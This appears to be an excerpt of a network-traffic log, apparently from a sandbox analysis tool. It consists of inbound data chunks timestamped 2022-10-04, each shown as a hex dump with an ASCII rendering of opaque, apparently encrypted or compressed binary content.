                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21032INData Raw: 43 91 b9 ec 7c 8b 09 a1 95 c4 b6 29 3f e8 ed 5c 2b f9 64 7a 1c d1 92 c1 2a cb 0c 62 b2 4c 11 f5 9a 66 aa 2d 87 4a 61 de ac 82 5e 1b f3 6e c8 bd 4b 40 3e 39 02 6d 02 fa 02 42 2f 1a 1c b7 f1 1f cf ed 02 89 25 a9 af 40 d0 07 be 9b 91 b2 11 bb 11 ec 50 33 ee e1 b8 e7 3b 34 17 75 21 e7 bc 31 3f 1b 11 8a fe 79 90 cf 32 b9 6f 1d 70 20 99 c7 f4 83 54 c9 6f af af dd 97 e0 c0 e0 47 5c 8d ef c8 09 6e 07 ee 3e d2 b5 56 84 f8 21 7d 01 8a 81 d8 a0 0c f7 17 fa d9 3c 10 b8 f7 71 fb 42 ed bc 68 cb f2 18 3c 62 57 1a de e1 11 41 9c db 12 48 58 37 c7 f4 f0 c3 ea 16 1c c7 29 59 6e 5c 23 41 57 ac de 16 84 f7 fc e2 68 2c 47 e7 22 6d f0 6d d1 db a6 7f c9 6d 3c 43 c8 23 b3 22 11 45 41 85 a9 21 04 66 9c e1 82 1d fb 4c cc d0 d4 5a ab f1 2c 30 3e eb 07 6f fd c3 2c b2 dc a7 6b f1 f6
                                                                                                                                                                                                                                    Data Ascii: C|)?\+dz*bLf-Ja^nK@>9mB/%@P3;4u!1?y2op ToG\n>V!}<qBh<bWAHX7)Yn\#AWh,G"mmm<C#"EA!fLZ,0>o,k
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21048INData Raw: 09 74 3e 07 b3 83 9d 16 bd ed aa f7 94 1e cf 0f e3 9e 98 41 c0 4c 68 c7 15 f9 a6 6d 87 54 e8 20 81 4f 30 5e c3 90 09 21 27 50 7b 15 0d c3 ee ec eb 22 61 6e b0 d3 12 5a f7 92 6d eb 13 cb 21 e2 b8 88 4a 6a 3f 70 83 b5 8f 1f e7 ea e8 c9 2e e6 25 35 c1 5a a6 18 5c 72 3a f7 6e cc 0f aa 62 45 cb 0f ca 0f a8 56 14 46 0e da be 8a cb 85 73 8b 75 0c a3 b2 d3 6e c5 fb 75 a0 cc e1 1e 14 dd 20 14 77 cc 89 9b 0a 68 67 46 44 a3 d9 4c 79 ff c2 f0 2f 05 a2 8b c7 43 2b b5 78 ab 36 9e e3 df 3f ea 41 50 e5 3d 36 ed ff 15 b5 1e 8d 55 28 fb c9 69 7e e8 e2 66 d6 87 57 bb 10 be f2 b2 fe 92 36 68 43 32 21 05 3d 19 9d 67 ba 3f 0e 95 5a 50 73 22 5a 4e d9 88 4b 40 a4 e5 be f1 ee 9c 15 a8 b5 d3 4c c8 01 3f 07 81 a9 da 90 7b 2f 4b 8a 82 dd c1 f2 f1 e7 e8 48 ab 0e 9c b1 2e 21 90 95 7b
                                                                                                                                                                                                                                    Data Ascii: t>ALhmT O0^!'P{"anZm!Jj?p.%5Z\r:nbEVFsunu whgFDLy/C+x6?AP=6U(i~fW6hC2!=g?ZPs"ZNK@L?{/KH.!{
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21064INData Raw: b5 ef 7d ff 11 a2 57 03 42 ab 4f 5b 67 aa 3b 17 9a ed 22 f1 4e b5 85 3d 8d 51 2c 53 eb 8d 91 98 cc 49 f0 d1 1f a4 8b 08 d6 96 ef e4 f9 ce 57 f7 1b 54 00 bc e4 25 97 36 00 4c 22 c3 c7 01 c3 27 16 fb 54 92 b3 64 97 c3 36 86 75 1e 42 30 db c5 f2 2f b7 3e ad ba 05 91 91 a3 fd 6a 00 7c 44 ca 59 2a 04 3d 40 e6 09 28 88 84 58 72 10 7d 46 9e db f9 2c 02 94 6a 99 5b 97 d5 26 66 bc 00 9d dc 7b 11 ca 2f db 04 3b f9 26 f4 ad bd 3e 11 95 b9 34 67 9f 34 78 ed e6 d8 c6 f7 4c 4a 21 83 8a 80 3a 28 b2 cf a5 6c 6e 27 1e 74 da 3e d2 55 00 22 cc 7e ae c5 1b 99 53 58 bf 22 b0 db 3f 60 d0 63 dd 7e 72 f0 de 69 9a f6 ea 10 22 8a 4b 79 26 76 3f e6 16 ad dc 27 bd ef 95 fe d9 0a 12 3c 73 0c 17 c2 a5 7e 76 f3 c0 5f fe 22 28 7f 65 07 d3 d1 ef 31 ba 05 5b b5 2f 8c 1c e2 dd 81 a7 a5 22
                                                                                                                                                                                                                                    Data Ascii: }WBO[g;"N=Q,SIWT%6L"'Td6uB0/>j|DY*=@(Xr}F,j[&f{/;&>4g4xLJ!:(ln't>U"~SX"?`c~ri"Ky&v?'<s~v_"(e1[/"
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21080INData Raw: ce ba d0 23 34 c9 3c 45 79 bf 76 83 49 bd 5d 7a 99 ea 02 8d 0f 3f 61 3f 1d 82 d7 9d 8e 7d d0 ff a7 4f 8c 3b 6a 7f e9 64 d5 e8 7f 62 96 8e bb 51 d0 89 bc ad b7 42 5e 30 15 26 1b a1 c8 19 fa f5 9e 6b 84 93 9a 6c d7 93 11 11 2f 03 19 9d d4 0f 23 57 d9 e7 3a 82 20 56 a4 24 cf ee 4d a5 ac 4d c2 80 ce 87 5e a0 99 52 d4 a7 d4 bb 67 d6 63 dd a2 cc 23 9a d1 30 cd f1 02 89 79 5b 92 b6 ca aa 5e 7d 39 9f 94 cb 75 2d 82 34 74 6a a7 42 af 52 25 42 04 af d6 e5 8c d4 60 73 52 64 b6 fa f5 68 ca 34 e4 ce 72 71 11 fb b1 4a 47 f8 36 6c ce ce 14 33 92 58 72 71 b1 ea 48 e1 2f 2d 8c e3 f7 57 f2 9c d8 03 40 50 da 56 fb bc 5c 08 fe da a1 08 bd 35 50 7c c1 ea 39 53 2e 43 6a 8e c2 54 87 a0 67 1a 69 bd 40 2c 8f 14 81 52 b4 ad 96 70 46 83 40 17 37 41 3c e0 84 2f f0 08 6c 66 bf 52 9f
                                                                                                                                                                                                                                    Data Ascii: #4<EyvI]z?a?}O;jdbQB^0&kl/#W: V$MM^Rgc#0y[^}9u-4tjBR%B`sRdh4rqJG6l3XrqH/-W@PV\5P|9S.CjTgi@,RpF@7A</lfR
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21096INData Raw: f6 6e a7 6e a0 b1 bd 51 a1 27 0a 49 9f af 70 35 2b d4 97 67 45 20 6e 75 c0 eb 86 88 3d 95 08 df 72 55 fc 5c 53 50 23 b3 37 04 97 57 22 ee 28 3c 02 01 06 2b e7 aa 89 63 c5 93 a6 26 99 33 46 3b 0f 54 9d e9 cc a9 2f 27 c0 e8 52 46 04 fb 1a d3 41 62 da 7d 63 be 82 9e 39 c7 7d 5b f6 d6 c6 33 2f 2d 1c 17 22 fa b1 7e db 38 59 7b 8f 42 03 a1 86 88 84 65 7a b5 cc ec 95 44 d8 24 d0 ff 7c 9b 32 ab 95 d7 70 75 8c db 04 91 c9 99 55 61 f8 35 cb 29 2c c6 a6 8d b1 97 67 b5 07 c2 3c 7b 6a f1 7a 22 ac 38 3a df 28 97 37 ba 57 92 8c e5 a6 f8 26 9b a3 bf f3 c4 83 7b 70 b5 ce ba 9c aa 92 92 ec 84 dc 42 f1 e5 d0 d7 61 31 fa 14 95 85 e9 22 12 88 4d 05 c5 f8 bf 4b 76 d0 1e 4d 5b be 70 f3 a9 e1 15 8c ce 79 e4 44 e4 d3 1c cc 6f da d2 73 a2 76 e6 46 6f d0 e2 f2 78 70 53 d6 cd b9 10
                                                                                                                                                                                                                                    Data Ascii: nnQ'Ip5+gE nu=rU\SP#7W"(<+c&3F;T/'RFAb}c9}[3/-"~8Y{BezD$|2puUa5),g<{jz"8:(7W&{pBa1"MKvM[pyDosvFoxpS
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21112INData Raw: c8 10 93 af d5 ec 7a db 85 47 e7 8f 77 9e b5 bd 9b 8c 55 c4 37 bf 6b 0b 05 ee 4e 14 96 5a d0 3a f5 09 c9 d3 7a 4d 2a f6 de 42 06 57 3b 3d 29 f1 9c 6f 37 2d fc 1b 40 a5 52 93 81 5a 9a 0a 13 00 9e 30 1b 27 38 1e ee 3e a1 40 4f b1 d4 ab 70 2a 37 b7 65 5c 9d a8 84 cf 95 65 99 c5 c7 54 44 16 fb 02 86 16 3a b6 13 cb 57 05 52 57 44 e2 60 aa f4 09 cd 1d 17 ae f0 79 a7 03 cf b2 2a 9e 4c 77 9a e6 35 76 c7 b6 10 13 c2 3f cc 2f ba d7 28 d8 b2 9f 38 b7 86 d1 9d e7 f4 8a cf 18 a3 f6 ac fc 66 c1 95 21 7a b7 b7 6d 91 df 34 e5 2a b9 83 d6 08 7f b6 66 78 6c c7 e8 99 e4 50 e5 f4 f3 fd f2 c0 5b 1e 15 df 52 36 86 45 01 06 05 34 0e df 80 13 fb 18 50 e4 2d 19 ce 0b 07 2d 87 15 fa e2 9f fa cc 7b 08 f6 ec a7 85 01 9c f9 79 6f d9 30 b0 c9 ea ab 5f 93 ac 66 56 05 5b c6 39 3e 31 39
                                                                                                                                                                                                                                    Data Ascii: zGwU7kNZ:zM*BW;=)o7-@RZ0'8>@Op*7e\eTD:WRWD`y*Lw5v?/(8f!zm4*fxlP[R6E4P--{yo0_fV[9>19
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21128INData Raw: 80 47 95 45 39 d1 c1 67 ed ce 76 2c 35 cd 08 59 5d aa 7a ad df ab 0e ef 11 78 96 f1 17 a3 b6 a5 85 f3 09 74 5f 02 0a da 9a e5 22 a9 a9 07 76 55 85 49 ff 4e 2d f2 31 ee dc 52 e6 64 74 58 f3 ac 60 7b ff 62 a3 cd b2 02 25 80 4b 23 de d9 ae 50 5a 32 af cf 2f 6a b2 f4 c0 0e 43 db 3e 83 30 24 2a 1b 1e bc 46 6a 2d 43 f2 30 1b bb 7f 6f ec ae 05 f6 66 0a aa 0f 0b 6a 0b 18 e8 4d 7f 5f ee c1 e7 76 86 a5 c8 60 4e 79 c8 ca 6b e4 18 d7 fd 95 b8 a0 72 70 bf 03 0d 0a 4c 81 91 af 22 45 fb a5 44 d0 14 bd e5 ec 63 b8 0d d1 10 2f b1 d4 e2 45 44 9e ab 5a 18 64 d3 49 e1 bd 13 b1 94 e5 be 96 27 2b 10 1d 2a da 11 9e ba a6 78 f4 7a 56 21 96 7e bb 0b e1 a1 42 6b 58 8e 5a 20 21 ef 79 2e 02 60 c0 a8 0c 0d 34 95 06 39 92 04 78 f6 a9 79 1b ad 6b 76 87 2f b8 0c e5 e9 33 5a c6 48 be 62
                                                                                                                                                                                                                                    Data Ascii: GE9gv,5Y]zxt_"vUIN-1RdtX`{b%K#PZ2/jC>0$*Fj-C0ofjM_v`NykrpL"EDc/EDZdI'+*xzV!~BkXZ !y.`49xykv/3ZHb
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21144INData Raw: 87 41 56 08 bf 16 56 be 5a 63 3f a8 0a 85 51 a8 4c 20 04 d7 d0 76 67 86 f8 7e 95 1a 8c 32 1b 40 28 e3 e2 c9 f3 00 8e 2c 33 d0 39 e9 41 50 7d bb a1 a5 c4 3c b6 35 f2 7b de df 27 29 87 91 7f 61 54 8d a1 45 91 ff c3 a4 f6 25 91 20 d3 e1 9e b6 bf 52 03 36 a7 6a 8c 3a 02 a4 0e b4 87 2f 35 34 e9 94 5e b4 2e 74 40 58 f7 0d d3 2e 9f 04 2c f8 46 98 9f 23 53 6a 41 82 82 b2 e7 66 eb 3e c0 ec eb c1 50 a6 12 71 b7 c4 d9 82 a5 1d a2 82 3a 6b 1e fb 73 82 df cd ce 80 b0 ea 5d 89 7e 1b 84 a2 f8 5a 5e 74 67 95 63 57 2b f1 c3 e1 b9 cc 39 29 e3 32 83 fa ef 6f 07 2f c5 02 a1 aa 84 52 8a da 8b 86 b1 72 a3 ce 54 67 5f 10 28 9c 6d 7f e3 d2 99 fe a0 c8 f5 9f 64 6a b9 85 72 12 42 ae fd 3f dd 76 17 a7 07 2c 17 ba a5 d4 b8 c1 c4 bc 46 26 ae 4e 31 30 35 55 e1 e2 78 70 7b ed b9 14 a3
                                                                                                                                                                                                                                    Data Ascii: AVVZc?QL vg~2@(,39AP}<5{')aTE% R6j:/54^.t@X.,F#SjAf>Pq:ks]~Z^tgcW+9)2o/RrTg_(mdjrB?v,F&N105Uxp{
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21160INData Raw: 08 f3 02 88 58 12 0b f4 e0 3e e2 af 39 97 e1 9a 61 1d a5 9d 91 67 d2 4d e4 07 70 eb 69 5b 29 4a 07 6a 6a fd cb 50 30 50 b3 c4 9d 35 4b 5b 07 8c ad 5b 1f 34 55 b5 5e 70 83 45 1d c9 bb 95 45 7e 4b 2d 9f 7c b6 f2 4a 70 d5 24 57 9b eb 15 fd 62 70 d2 b8 5c 70 a3 56 49 e9 67 45 c3 e1 f0 74 50 9c ba 28 eb 97 b7 21 e2 4a f9 ca f3 ff bc e7 86 aa 59 04 d6 ef 6f cd b5 e6 83 d3 8f f3 6a f1 b2 f6 19 83 07 94 55 08 8b ae ae 52 e4 58 bc 41 4d 28 67 8a cc 6f 20 34 cb 66 fe b6 09 e4 5d 74 0b 81 75 7b 82 09 30 cc a8 8a cb e8 ee bf 9c d5 9f f1 e3 49 21 c3 d2 37 4c 02 8c 0c b8 8c 73 17 78 98 7d 81 d9 06 51 d3 eb 18 7d 05 91 44 ee 51 f7 5e b2 74 eb 67 8e 58 22 27 52 f5 68 24 4a 75 8b 6f f0 ec 2d cb 1d 41 d2 63 2e ff 1a a2 4d a0 4f 86 f6 aa 50 3f e6 33 b9 bc 31 4b 4d 5f b1 9f
                                                                                                                                                                                                                                    Data Ascii: X>9agMpi[)JjjP0P5K[[4U^pEE~K-|Jp$Wbp\pVIgEtP(!JYojURXAM(go 4f]tu{0I!7Lsx}Q}DQ^tgX"'Rh$Juo-Ac.MOP?31KM_
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21176INData Raw: 56 90 6c 48 36 40 c0 de 33 27 cd 47 2b 3c 67 63 a5 87 33 15 3c 71 9b 8e ca b7 69 f9 6c 3b f4 74 25 88 19 1c 1e 58 47 91 fe 78 35 e2 f3 48 6a 34 85 29 10 43 7b 74 46 dd b8 18 c3 45 1f 24 ba a4 12 17 6a 29 d2 17 f1 17 38 ed f5 ce 32 ed ee 1d 81 96 3a 86 96 41 57 fd 5b 26 e2 02 17 a7 0e a4 1a 92 de f9 55 bc 6c dc f7 5b 34 4d 3a eb 76 e2 ee 64 90 06 b8 b6 ad 0e 1f ed 6a 9f 5e ad 5c 6e 36 1e 93 e8 08 7c 6c 6e 78 fe 99 75 65 08 9d 9c 1e 24 0d 7e d1 a6 2c b3 50 45 ec fc 34 b0 6c e6 e3 9c f9 6e 2a af 77 13 32 d6 d5 18 e4 a6 2a ca 78 73 52 40 14 77 3d 7a 86 a8 5f 42 2a 1f bf 51 96 5b 7c f1 b7 85 8f 41 0c 53 93 e6 b6 51 38 6a ca b9 02 cf 79 ab bc 2b d2 0c 5c cb 25 b9 bf 9b b1 2b 82 cb 15 48 c3 fa ab dc 98 8f a1 78 f4 0c 87 4c 26 b9 53 7c c0 36 d0 58 ee 2c d1 bc 2d
                                                                                                                                                                                                                                    Data Ascii: VlH6@3'G+<gc3<qil;t%XGx5Hj4)C{tFE$j)82:AW[&Ul[4M:vdj^\n6|lnxue$~,PE4ln*w2*xsR@w=z_B*Q[|ASQ8jy+\%+HxL&S|6X,-
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21192INData Raw: b7 b4 04 36 de ae 6e 78 2d c0 be ce bb 31 25 25 8e 28 d3 27 17 47 0d ed 45 77 ec 6a ac 3b 32 5a 78 b5 e8 92 07 47 79 cf 98 70 fa 34 0e 6d 9f 60 19 89 d7 30 f2 be 02 75 3f 40 de 1f e6 7e ad 1c 25 64 15 48 28 13 bf 87 ea 70 3a be f1 ac bb 49 bc 7e 5c d4 36 fa 1d 66 2a 06 c3 c4 b1 c4 3f 8c 45 98 f6 ca b2 00 70 63 dd bb 43 84 8b f1 7f 4c ca 4e 0b 33 67 7f cd af c9 55 f7 ca f8 6c 96 fc b2 d3 01 e0 e0 dc 0d cb 54 16 00 3e 24 4a 07 b6 9b 40 83 45 d3 a7 6d c0 e4 90 ee 3a cd fe 86 45 3d 31 cf b6 55 99 0d 22 e3 7f a7 58 0d c0 54 5b 14 90 b9 88 3a 79 61 2d eb 73 c2 01 67 70 c0 c4 a4 57 0c 6f ab 1e a9 9a 40 de 71 f5 66 85 84 27 bd 85 4e c8 26 ec 39 28 a6 96 49 f8 d1 c1 82 28 c3 4f ad 74 c6 20 de cd 87 42 49 de b2 a5 7e bf 39 93 35 22 da 22 ea 30 45 a4 48 23 e0 6b c6
                                                                                                                                                                                                                                    Data Ascii: 6nx-1%%('GEwj;2ZxGyp4m`0u?@~%dH(p:I~\6f*?EpcCLN3gUlT>$J@Em:E=1U"XT[:ya-sgpWo@qf'N&9(I(Ot BI~95""0EH#k
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21208INData Raw: b7 78 18 0c cf a1 5b ad b5 89 22 c1 65 c1 d8 df f6 98 97 9d 3f 3e e7 9a 67 86 af 9c b7 8f 9e 2e 50 56 ab 0c f6 6c da e6 26 bb e6 51 76 5c 58 09 be 89 08 7d 13 9f bb 54 5e 57 7c e2 b5 39 5a 02 be d7 0e 5a 6d 57 22 53 7c eb 26 2e e8 db 38 3a 19 98 a9 e7 16 83 2d cb 29 58 b6 0e 06 ab b6 84 39 43 7a 3b 45 27 68 fb d1 04 4a 25 af 7b 1d 0d 28 55 f5 fd d1 5e d1 d1 47 f7 58 8d 71 3e 6a ab e4 77 05 be aa 15 8c 81 bf b5 b5 97 ad 01 e3 6a c5 8c 45 16 4c 1f 9f 82 ef ce 89 9c 50 80 d4 e6 e5 15 1f 05 13 58 e3 88 5b 1a 97 82 6d 28 21 45 eb 75 d5 36 b4 5c 61 be e2 e9 36 fc c2 db 00 e2 54 1c 44 71 31 23 4b 83 dd ce b3 2e d3 5a 89 c5 c4 cd 9c 1a 55 4f 8f 4b 9e f5 1f f5 42 c3 18 d5 72 06 2f 7d 13 bb 6b e2 ba b4 80 e3 c4 89 f9 0e 5a 35 a8 51 20 80 76 01 77 dc 5f ca c8 da f9
                                                                                                                                                                                                                                    Data Ascii: x["e?>g.PVl&Qv\X}T^W|9ZZmW"S|&.8:-)X9Cz;E'hJ%{(U^GXq>jwjELPX[m(!Eu6\a6TDq1#K.ZUOKBr/}kZ5Q vw_
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21224INData Raw: f9 8b b6 7d b8 b0 f5 08 1c 68 0d 25 7a 84 7d 95 c0 97 74 6e c6 26 52 0e d1 cb 23 ad fd b7 9d 74 85 06 28 1d 88 cc f8 0b 88 42 ac a6 d4 0c 17 63 cd 7e 65 c2 f7 63 f5 32 bb d1 63 79 31 61 b5 e7 b0 88 65 79 b9 e4 21 b3 97 cd d4 06 45 3e 95 e7 42 17 b2 00 50 14 23 df 7a 2e fd d6 3e b0 91 fc 13 8d 22 8b 3e aa 5a f6 34 ae 37 e3 d1 87 cb 8e 82 de 76 ce 46 2d de 31 18 cf 6d 07 d2 18 90 7e 8f 4b 1c ae 71 e8 f9 ba db cb 4f 99 33 fd c2 f8 7d 6c 9f a6 01 e8 b3 80 ae b5 c3 f5 33 33 d1 49 3b b7 75 33 b3 c1 cf cd 88 50 15 93 07 df c5 11 f9 bf 4a 9a 97 0a ea 54 32 16 f0 df 6f 87 fe 2d e6 26 ea d6 29 1d 20 26 2f 16 da 4a 41 8e 49 83 30 45 13 d5 ca 78 ad 7d 60 40 e5 5f 06 c5 52 e4 c8 e6 c4 ee 56 89 2a a9 fe 5f 1e 3e 4e f3 cd bf ae 68 fd e3 f0 7d 94 9a a8 e4 16 67 dc 9c b2
                                                                                                                                                                                                                                    Data Ascii: }h%z}tn&R#t(Bc~ec2cy1aey!E>BP#z.>">Z47vF-1m~KqO3}l33I;u3PJT2o-&) &/JAI0Ex}`@_RV*_>Nh}g
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21240INData Raw: da 9c 0b f8 80 87 50 d8 16 4f 38 f3 b2 2f 49 b5 5e ae 40 03 ba e2 e9 d0 10 89 b2 08 a2 c7 4e 93 b3 38 6d 1c 4f 82 97 be 07 b3 a3 ee 51 5d 59 7b 59 89 a3 22 56 78 a6 a1 2a a8 47 52 c5 ed 1a d7 af 33 a2 b3 4c a4 9d f6 c4 73 a5 54 55 12 f1 65 df e6 41 56 da b7 cc 78 20 4f f3 23 1b f1 db e9 43 20 69 fa 82 50 85 16 3a 3c ef 0a 9f 31 53 40 e2 4d 9a 92 f9 82 b0 ec 3d 32 e7 ad a0 5c e5 f3 0f 8e 4c 71 ff 2a 47 d2 ac 98 ea ed 82 25 68 a9 3f e7 6e 2c c3 28 91 d5 d2 15 d6 89 80 fe 9f 5e bc fb 54 3f dd 06 5f ab e0 17 8a 58 43 47 29 26 eb d8 19 eb 2f 9b 2b a0 26 2a 3a f6 d1 d3 e0 33 42 66 53 d1 6f 79 4f 8f 28 71 3c ac 2e cd ac 5b 48 c9 aa 75 2f 46 a3 a3 1f c6 79 48 29 86 69 75 42 a2 65 cd 5c 45 a8 37 4b 1e ff 9e 6d 09 5b eb 77 78 b1 f0 ec 91 67 91 ea bb 36 83 e6 37 f8
                                                                                                                                                                                                                                    Data Ascii: PO8/I^@N8mOQ]Y{Y"Vx*GR3LsTUeAVx O#C iP:<1S@M=2\Lq*G%h?n,(^T?_XCG)&/+&*:3BfSoyO(q<.[Hu/FyH)iuBe\E7Km[wxg67
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21256INData Raw: de d6 e5 70 59 16 46 b2 ea 33 e3 8a 17 61 17 45 4d a9 72 fd ce 1e 5c 8b 9f ca 15 7c cf 70 00 1a 21 5e 7e 99 af 65 2b 42 b4 3a b0 95 5e 8e 85 5d 4b b5 02 2b 07 0a 21 1c cd 24 eb 52 5a 3a 59 ef 73 d8 f5 00 f9 6e 1e 42 0d dd 4e 0f 00 35 f6 46 b3 2f d6 8b a9 5e 72 61 6a 5b bc c2 8b f4 42 52 b4 5c f4 62 3e 34 00 06 d3 8f 03 da 06 a7 5b 4d af 79 42 7c 5f ca 03 ee ed 4a e3 1f 88 cc a9 75 48 21 fd 47 04 78 81 f3 20 67 ec a6 a1 b2 c0 4f cf d8 4f bc 14 7c 8d 0a 2b d8 1f 9d 68 ae f9 6c f2 43 b5 31 52 2b 72 f0 26 ff 80 6f 28 f1 d1 42 c7 85 2c 21 6e 3a 13 fe 42 87 bc db 29 04 92 77 17 41 0e 72 88 45 ff 37 3f e4 5c 1a af 6c 70 6e d0 50 b8 ea 6b d3 2d 53 ba 5c 08 8c 6f d8 69 ca 37 e9 f5 78 45 f9 7f 77 ea c7 25 b5 b2 8b 77 7e e4 18 bc 2f 56 b6 d7 d9 d5 da 4f 2f 81 50 09
                                                                                                                                                                                                                                    Data Ascii: pYF3aEMr\|p!^~e+B:^]K+!$RZ:YsnBN5F/^raj[BR\b>4[MyB|_JuH!Gx gOO|+hlC1R+r&o(B,!n:B)wArE7?\lpnPk-S\oi7xEw%w~/VO/P
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21272INData Raw: ed 9b 72 31 10 db a9 dd c2 13 af 42 e3 98 0d ed 80 cf 9f 38 70 ae 46 52 d3 7b 9a f1 28 d9 87 95 14 d8 42 02 fc 99 ea 51 fd 7f 60 c4 77 8f 7c 61 68 27 87 57 bb 86 51 91 42 4b be c8 6d 31 c0 7e 5f 45 99 17 e8 9b 78 50 21 78 cc 73 5c b4 52 94 2d 31 54 3b fe e2 dc af cb 45 fc 52 c0 2d 9b c1 1d a9 f3 a9 c0 d4 91 ab d4 a1 4e 17 ea 58 aa e3 7f b2 bb 38 07 c6 6d 9f 86 7e a5 a8 06 07 5d 24 18 ed ee e9 fc 23 1b fb 22 7b f1 f6 6a 7f 42 15 b6 c3 bc 16 48 57 64 43 59 93 6f 35 2f c9 7a 4b 00 86 ba 6f 0d 23 2e 3c ee 1a 63 9d 85 44 e5 37 f1 50 d7 7c 79 3d 0c 8f 6f cd f3 04 4c 7a 3f 4e 8d b4 e1 43 93 47 71 b8 4b 60 cd 78 1d 14 1f 66 ff 45 c2 87 cb a6 9b 5c 97 43 53 24 cf b1 e1 c9 2d 8a 76 ca 87 27 98 e4 6c 07 03 fa 39 bc bc da ab c4 93 b5 fd 9b 11 17 1d 7e d8 c2 7d e4 07
                                                                                                                                                                                                                                    Data Ascii: r1B8pFR{(BQ`w|ah'WQBKm1~_ExP!xs\R-1T;ER-NX8m~]$#"{jBHWdCYo5/zKo#.<cD7P|y=oLz?NCGqK`xfE\CS$-v'l9~}
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21288INData Raw: a6 67 c4 ca d7 34 9c b5 f7 28 5e 93 2e d0 85 f0 c6 0c a2 0c 4c 2f e2 3c a6 42 20 b3 c8 b9 cc 0c 47 2b c9 b2 1f e1 07 1c 3e cc cf e8 51 e0 31 a8 f8 35 70 5b 7b 14 49 72 63 bf 80 af 7d 0c 74 c5 9a c1 fe ca ec 02 70 9b 37 b6 a2 df b7 fd 49 1a 9f bd b7 ab 59 5c 12 cc 42 23 e4 44 0c 10 7b b2 12 4f 3d 40 0d 99 cd ec da 47 ad b0 ac f0 75 16 1a 59 fa 8e 09 3f 7c b4 fb 4f 6f a0 44 78 50 16 51 04 0c 23 83 3f 0e 96 5f 6e 0b 8d f7 b4 41 e1 bf f3 30 0b ce 87 26 10 00 b8 35 c3 f4 70 56 44 db f0 30 76 96 96 5f 7e 5c f5 b3 a8 57 f9 7f 25 6d 68 a1 aa eb a9 d2 40 25 fe cf 99 cb 2c 11 3c 86 76 21 f7 b2 27 7a 52 e9 c5 b8 f8 09 8d 59 7a 3f 77 42 34 20 8d 25 ce b1 1d 29 af 65 be 7e 10 e1 8a 96 84 b3 ae 4a 3e d9 92 bc 36 08 ae 8c 84 38 c7 fa 6f 25 cf 0e d7 9d 7f ef 49 ca 25 5f
                                                                                                                                                                                                                                    Data Ascii: g4(^.L/<B G+>Q15p[{Irc}tp7IY\B#D{O=@GuY?|OoDxPQ#?_nA0&5pVD0v_~\W%mh@%,<v!'zRYz?wB4 %)e~J>68o%I%_
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21304INData Raw: ca 65 7e 8f 79 32 90 dc a1 8a 76 e4 94 ab 47 a9 48 75 c7 50 07 34 7a 26 a8 08 2f 8a 1c df 46 20 26 56 b4 c4 c3 7f 8f 77 2b c9 df cf 14 2f ab 45 db 9c f8 ff 35 78 58 c5 42 a2 c6 18 cc a9 28 19 aa 02 47 f7 7c e1 91 7f ea 5f e6 10 00 0f 6d 53 71 68 c3 6e 15 2d a0 80 cc 5c 72 b1 9b ca 95 b8 f0 11 11 9a 6b 61 ec 3a fa 8e ae 8d 38 0d f2 d4 4c 1a ad 34 e2 68 9d 6a 0d b9 f6 4d 8c 17 24 9c 38 21 b1 86 68 8a ba 14 4b 2a da 60 bc 5d da c5 d3 da c4 0d 49 fd 39 69 e5 af a1 af d9 34 5c eb 4c 5c 42 f7 d5 73 d6 4f 97 bd 7b 1f 42 bc 48 8b c1 2b 45 e3 9b 0a b9 2c 8a 95 53 70 54 f4 68 6a 6f ae cd ec d9 4c 0b b7 d6 fe f5 c3 3d a4 95 a2 ae 93 6e c5 1f 3f 2a 15 2f ce 6a 3d c8 f0 05 51 de 3e e1 9a ee 45 e7 42 01 01 98 e4 98 c5 65 64 ef 62 76 5e b3 b0 2f 32 06 b1 8f 39 d6 eb b3
                                                                                                                                                                                                                                    Data Ascii: e~y2vGHuP4z&/F &Vw+/E5xXB(G|_mSqhn-\rka:8L4hjM$8!hK*`]I9i4\L\BsO{BH+E,SpThjoL=n?*/j=Q>EBedbv^/29
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21320INData Raw: 05 08 9b cd 30 ff da bf 1c b0 8c b1 ac 6b fa 48 7c 7d 2d 94 46 b8 fe a6 97 d8 d4 21 61 96 5a 42 f1 36 57 1e 5b 69 95 cf 0d aa 9b d5 d0 db 4f 62 ec 4b fa 1f e8 b3 3d d0 45 2b 45 5c 05 7c b4 45 c2 21 f5 7c 51 64 2b 2f c6 87 b2 e1 5c 7c d9 62 e6 40 6a 03 ae 2e c0 12 01 85 d9 51 e3 9f 27 50 42 69 88 f2 c6 36 c4 6e 76 79 f1 d3 40 eb b8 80 83 5c 76 90 bb 13 78 72 49 d0 a7 34 36 07 b0 44 4a d9 b9 4f 56 60 4b e6 d3 db 52 00 c1 a4 4a a1 62 69 f6 ef fe 3c ac df 34 2b 61 f1 59 a9 8d 8a cf 3c 87 11 e0 cf ba eb f8 73 b7 57 a9 88 30 59 75 9f c6 10 1d d4 dc 70 a4 87 81 f6 7c 40 ca 31 e2 f5 7d 0e 67 dc 4f f1 c6 1b 89 1b dc 62 75 a8 45 ed 7c a3 5a 98 ff ca 02 84 60 ef 51 b7 9e 7f 82 5c f2 5e db e1 29 c3 19 ef 5f 9d e6 14 fe ac 9d a3 6b 98 c6 5b 83 b3 2c 14 12 be 7c 1a 42
                                                                                                                                                                                                                                    Data Ascii: 0kH|}-F!aZB6W[iObK=E+E\|E!|Qd+/\|b@j.Q'PBi6nvy@\vxrI46DJOV`KRJbi<4+aY<sW0Yup|@1}gObuE|Z`Q\^)_k[,|B
